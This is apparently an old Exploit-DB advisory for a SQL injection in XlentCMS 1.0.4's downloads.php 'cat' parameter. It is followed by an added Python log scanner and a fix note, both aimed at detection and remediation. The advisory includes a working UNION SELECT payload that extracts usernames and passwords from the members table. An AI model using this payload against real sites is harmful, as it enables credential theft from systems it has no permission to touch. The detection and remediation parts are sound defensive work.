XlentCMS 1.0.4 - 'downloads.php?cat' SQL Injection

EDB-ID: 10899
CVE: N/A
Author: Gamoscu
Type: webapps
Platform: PHP
Date: 2010-01-01

 Script      : XlentCMS V1.0.4 (downloads.php?cat) SQL Injection Vulnerability

 Script site : http://sphere.xlentprojects.se/portal.php 

 AUTHOR      : Gamoscu
   
 HOME        : http://www.1923turk.biz

 Blog        : http://gamoscu.wordpress.com/

 Greetz      : Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://www.xxx.com/path/downloads.php?cat=[SQL]

Example:

1+union+select+1,id,3,4,username%20,password,7,8,9+from+xcms_members--


The homeland is loved through deeds, not words

Let the envious burst; don't take it hard
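
A log check for the `cat` parameter issue described above, as an added example that is not part of the original advisory or of XlentCMS: it flags any request to `downloads.php` whose URL-decoded `cat` value is not a plain integer. That legitimate `cat` values are integers is an assumption, as is the combined log format; the log lines are constructed and the helper names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] "GET /path/downloads.php?cat=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2010:10:00:07 +0000] "GET /path/downloads.php?cat=1+union+select+1,id,3,4,username%20,password,7,8,9+from+xcms_members-- HTTP/1.1" 200 7340 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2010:10:00:09 +0000] "GET /path/index.php?page=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2010:10:00:12 +0000] "GET /path/downloads.php?cat=2&cat=2%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"
"""

# Hypothetical helper names; the request-line regex assumes combined log format.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
SQL_HINT_RE = re.compile(r"\b(union|select|from)\b|--|/\*|'", re.I)
INTEGER_RE = re.compile(r"[0-9]+")  # assumption: valid category ids are integers


def suspicious_cat_requests(log_text, script="downloads.php", param="cat"):
    """Return one finding per non-integer `cat` value sent to downloads.php."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path.rsplit("/", 1)[-1].lower() != script:
            continue
        # parse_qs decodes '+' and %xx and keeps repeated parameters.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if INTEGER_RE.fullmatch(value):
                continue
            findings.append({
                "line": lineno,
                "ip": m["ip"],
                "status": int(m["status"]),
                "value": value,
                "sql_like": bool(SQL_HINT_RE.search(value)),
            })
    return findings


if __name__ == "__main__":
    for finding in suspicious_cat_requests(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule is the server-side fix: validate `cat` as an integer and bind it as a query parameter instead of concatenating it into the SQL string.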